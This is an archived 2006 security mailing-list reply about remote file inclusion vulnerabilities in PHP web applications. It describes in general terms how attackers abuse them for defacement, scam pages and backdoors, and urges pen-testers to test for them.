Re: Remote File Include Vulns (Are you testing for it, are you teaching it)

From: espen@multigeeks.com
Date: Mon Oct 16 2006 - 17:37:15 EDT

• Next message: Jon Hart: "Re: unswitched behavior of a switched network..."
• Previous message: Hagen, Eric: "RE: BruteForcing?"
• In reply to: Joseph McCray: "Remote File Include Vulns (Are you testing for it, are you teaching it)"
• Next in thread: Gareth Davies: "Re: Remote File Include Vulns (Are you testing for it, are you teaching it)"
• Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]

Quoting Joseph McCray <joe@learnsecurityonline.com>:

> I've been spending a lot of time googling these php shells (c99/r57 et
> al) lately. It appears that people are getting these on servers via
> Remote File Include vulnerabilities.
>
> I'm curious how many auditors are 1) testing for this stuff in your
> audits. Tons of blog, forum, and wiki packages have these vulns - are
> you guys testing for this stuff, and more importantly are you finding it
> vuln in your audits?
>
>
> --
> Joe McCray
> Toll Free: 1-866-892-2132
> Email: joe@learnsecurityonline.com
> Web: https://www.learnsecurityonline.com
>
>
> Learn Security Online, Inc.
>
> * Security Games * Simulators
> * Challenge Servers * Courses
> * Hacking Competitions * Hacklab Access
>

Hi Joe,

remote file inclusion (RFI) has become a huge problem and security gap
the last couple of years, therefore I believe that this is something
to be taken seriously. These vulnerabilities are very easy to exploit;
I see it being exploited pretty often, usually by script kiddies whose
goal is to deface the site - but often also to dump forum databases etc.

To give you a little example of this, my brother owns a site which was
vulnerable to RFI. Someone exploited this and set up a paypal scam
site. Luckily enough, the web host suspended the page temporarily to
let him clean up the mess.

Also, when the web servers have writeable directories, it is easy for
the attacker to upload different kinds of (malicious?) stuff. Usually
backdoors, trojans, psybncs/eggdrops etc. As you probably understand,
a lot of these boxes are being used for DDoSing purposes etc.
Another thing that's good for the attacker; if safe mode is set to off.

As I've mentioned earlier, I believe this is something to *really*
take seriously, especially while performing pen-tests.

Excuse my English.

Regards,
Espen D.

------------------------------------------------------------------------
This List Sponsored by: Cenzic

Need to secure your web apps?
Cenzic Hailstorm finds vulnerabilities fast.
Click the link to buy it, try it or download Hailstorm for FREE.
http://www.cenzic.com/products_services/download_hailstorm.php?camp=701600000008bOW
------------------------------------------------------------------------

• Next message: Jon Hart: "Re: unswitched behavior of a switched network..."
• Previous message: Hagen, Eric: "RE: BruteForcing?"
• In reply to: Joseph McCray: "Remote File Include Vulns (Are you testing for it, are you teaching it)"
• Next in thread: Gareth Davies: "Re: Remote File Include Vulns (Are you testing for it, are you teaching it)"
• Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]

This archive was generated by hypermail 2.1.7 : Sat Apr 12 2008 - 10:57:13 EDT